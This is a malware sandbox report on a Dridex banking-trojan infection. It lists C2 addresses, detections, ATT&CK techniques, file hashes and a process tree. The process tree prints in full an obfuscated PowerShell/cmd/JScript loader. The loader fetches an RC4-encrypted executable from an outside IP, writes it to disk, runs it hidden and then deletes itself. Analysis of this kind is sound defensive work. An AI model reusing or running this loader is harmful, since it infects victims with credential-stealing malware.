dridex | hxxp://zeroexit[.]xyz/9HJDckdsvfsdefvs34

Resubmissions

25-01-2021 06:31

210125-sgbwyh11n6 5

24-01-2021 23:45

210124-vl6f4bk9f2 10

Analysis

max time kernel
150s
max time network
137s
platform
windows7_x64
resource
win7v20201028
submitted
24-01-2021 23:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://zeroexit.xyz/9HJDckdsvfsdefvs34

Score

10^/10

dridex 10111 botnet cryptone discovery evasion loader packer ransomware trojan

Malware Config

Extracted

Family

dridex

Botnet

10111

162.241.44.26:9443

185.184.25.234:4664

138.201.138.91:3389

rc4.plain

Signatures

Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex

CryptOne packer 4 IoCs

Detects CryptOne packer defined in NCC blogpost.

cryptone packer

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\k5yuz.exe	cryptone
C:\Users\Admin\AppData\Local\Temp\k5yuz.exe	cryptone
\Users\Admin\AppData\Local\Temp\k5yuz.exe	cryptone
C:\Users\Admin\AppData\Local\Temp\k5yuz.exe	cryptone

Dridex Loader 2 IoCs

Detects Dridex both x86 and x64 loader in memory.

botnet loader

Processes:

resource	yara_rule
behavioral1/memory/1656-67-0x0000000000400000-0x000000000043D000-memory.dmp	dridex_ldr
behavioral1/memory/1656-71-0x0000000000400000-0x000000000043D000-memory.dmp	dridex_ldr

Blocklisted process makes network request 2 IoCs

Processes:

wscript.exewscript.exe

flow pid process

13 1640 wscript.exe
14 1108 wscript.exe
Executes dropped EXE 1 IoCs

Processes:

k5yuz.exe

pid process

1656 k5yuz.exe
Loads dropped DLL 2 IoCs

Processes:

cmd.exe

pid process

676 cmd.exe
676 cmd.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

k5yuz.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA k5yuz.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082

flow	pid	process
13	1640	wscript.exe
14	1108	wscript.exe

pid	process
1656	k5yuz.exe

pid	process
676	cmd.exe
676	cmd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k5yuz.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{61562AF1-5EA6-11EB-AA5C-E6A19248D3FE} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "318300403"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000956dba6a573b2affc1d36c847628d5253982e24487ba505d47705cb8a2680ec9000000000e8000000002000020000000e2c6188ae7296661ad361be899f0a27f4466c3809f7bddbb47843b87f3e4dc209000000074b5e439b6ced4b0eec257d44c5d4622455a1646f3543616ad64165377f81e66a5528e26eaee9f064129c776bea0e27c796ac80039be076cd43b4153e59430eb04159b029a03ede84ba0d5735785bcf6dc97beb978c825074553bcb5e6da2719e092e7fb2c6cea41b17018d925cac52ef8e66f69548633212207bccc1329925f77c951313761f3218912691163164fa540000000e2b58794781a0d0402b6d7b60a1071a3725348f5479593fcecabda9cbdc3f3a6f68731fe28069993947ac7d107da977610789d93e6345f4974db89e84c0063ae	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a056b03eb3f2d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000987e037d9d29f9a8ed3c70ff71dd3a482278536b641909506c3977cd8be8de42000000000e800000000200002000000038294b6dbe5d9108dfebf5a87c436ccb61acbed07b6fe513848952b851d1c0f02000000075819e95bc38a6128cbe74179a8b0b33efea36afaa94187f192c08784b1302da40000000c04c4b1e3103d670b4c3d1fc5a116de2968e5b981f11d3429c516207893234137e8c56a0ddd37c81dd63e7b86a4d1a56cd48e804ec959a77a3afade3b144caca	iexplore.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

PowerShell.exePowerShell.exe

pid process

1868 PowerShell.exe
1188 PowerShell.exe
1188 PowerShell.exe
1868 PowerShell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

PowerShell.exePowerShell.exe

description pid process

Token: SeDebugPrivilege 1868 PowerShell.exe
Token: SeDebugPrivilege 1188 PowerShell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

892 iexplore.exe

pid	process
1868	PowerShell.exe
1188	PowerShell.exe
1188	PowerShell.exe
1868	PowerShell.exe

description	pid	process
Token: SeDebugPrivilege	1868	PowerShell.exe
Token: SeDebugPrivilege	1188	PowerShell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
892	iexplore.exe
892	iexplore.exe
1328	IEXPLORE.EXE
1328	IEXPLORE.EXE
1492	IEXPLORE.EXE
1492	IEXPLORE.EXE
1312	IEXPLORE.EXE
1312	IEXPLORE.EXE
1312	IEXPLORE.EXE
1312	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEPowerShell.execmd.exePowerShell.execmd.exewscript.execmd.exe

description	pid	process	target process
PID 892 wrote to memory of 1328	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1328	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1328	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1328	892	iexplore.exe	IEXPLORE.EXE
PID 1328 wrote to memory of 1188	1328	IEXPLORE.EXE	PowerShell.exe
PID 1328 wrote to memory of 1188	1328	IEXPLORE.EXE	PowerShell.exe
PID 1328 wrote to memory of 1188	1328	IEXPLORE.EXE	PowerShell.exe
PID 1328 wrote to memory of 1188	1328	IEXPLORE.EXE	PowerShell.exe
PID 892 wrote to memory of 1492	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1492	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1492	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1492	892	iexplore.exe	IEXPLORE.EXE
PID 1492 wrote to memory of 1868	1492	IEXPLORE.EXE	PowerShell.exe
PID 1492 wrote to memory of 1868	1492	IEXPLORE.EXE	PowerShell.exe
PID 1492 wrote to memory of 1868	1492	IEXPLORE.EXE	PowerShell.exe
PID 1492 wrote to memory of 1868	1492	IEXPLORE.EXE	PowerShell.exe
PID 892 wrote to memory of 1312	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1312	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1312	892	iexplore.exe	IEXPLORE.EXE
PID 892 wrote to memory of 1312	892	iexplore.exe	IEXPLORE.EXE
PID 1868 wrote to memory of 1992	1868	PowerShell.exe	cmd.exe
PID 1868 wrote to memory of 1992	1868	PowerShell.exe	cmd.exe
PID 1868 wrote to memory of 1992	1868	PowerShell.exe	cmd.exe
PID 1868 wrote to memory of 1992	1868	PowerShell.exe	cmd.exe
PID 1992 wrote to memory of 1108	1992	cmd.exe	wscript.exe
PID 1992 wrote to memory of 1108	1992	cmd.exe	wscript.exe
PID 1992 wrote to memory of 1108	1992	cmd.exe	wscript.exe
PID 1992 wrote to memory of 1108	1992	cmd.exe	wscript.exe
PID 1188 wrote to memory of 1696	1188	PowerShell.exe	cmd.exe
PID 1188 wrote to memory of 1696	1188	PowerShell.exe	cmd.exe
PID 1188 wrote to memory of 1696	1188	PowerShell.exe	cmd.exe
PID 1188 wrote to memory of 1696	1188	PowerShell.exe	cmd.exe
PID 1696 wrote to memory of 1640	1696	cmd.exe	wscript.exe
PID 1696 wrote to memory of 1640	1696	cmd.exe	wscript.exe
PID 1696 wrote to memory of 1640	1696	cmd.exe	wscript.exe
PID 1696 wrote to memory of 1640	1696	cmd.exe	wscript.exe
PID 1108 wrote to memory of 676	1108	wscript.exe	cmd.exe
PID 1108 wrote to memory of 676	1108	wscript.exe	cmd.exe
PID 1108 wrote to memory of 676	1108	wscript.exe	cmd.exe
PID 1108 wrote to memory of 676	1108	wscript.exe	cmd.exe
PID 676 wrote to memory of 1656	676	cmd.exe	k5yuz.exe
PID 676 wrote to memory of 1656	676	cmd.exe	k5yuz.exe
PID 676 wrote to memory of 1656	676	cmd.exe	k5yuz.exe
PID 676 wrote to memory of 1656	676	cmd.exe	k5yuz.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://zeroexit.xyz/9HJDckdsvfsdefvs34
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:892

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=^&FieJTJh^&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5^&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz^&zsqvYbgLMzk3MQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=^&FieJTJh^&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5^&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz^&zsqvYbgLMzk3MQ== 1
4⤵
- Suspicious use of WriteProcessMemory
PID:1696

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=&FieJTJh&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz&zsqvYbgLMzk3MQ== 1
5⤵
- Blocklisted process makes network request
PID:1640

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:340994 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2^&LsY^&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y^&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w^&OCANDEwOQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2^&LsY^&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y^&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w^&OCANDEwOQ== 1
4⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2&LsY&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w&OCANDEwOQ== 1
5⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c k5yuz.exe
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:676

C:\Users\Admin\AppData\Local\Temp\k5yuz.exe
k5yuz.exe
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1656

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:209934 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1312

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
c14ce2d192d610b09898a1cf3ae24d02

SHA1
04d901c4cc0f6e84b3076d915edaae6ff63d41b6

SHA256
70e60a8944bd8ae0d2efdb45ecd25b45c661d5ecfccd319fd761380993ddf558

SHA512
ab949b92ee98d73628c2c96345aeac4851796f5ce5318e50178ac575f75107ce47b1898199a5044e89935300ad584c02a757c53d43cfd53f63a571bba112bc07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
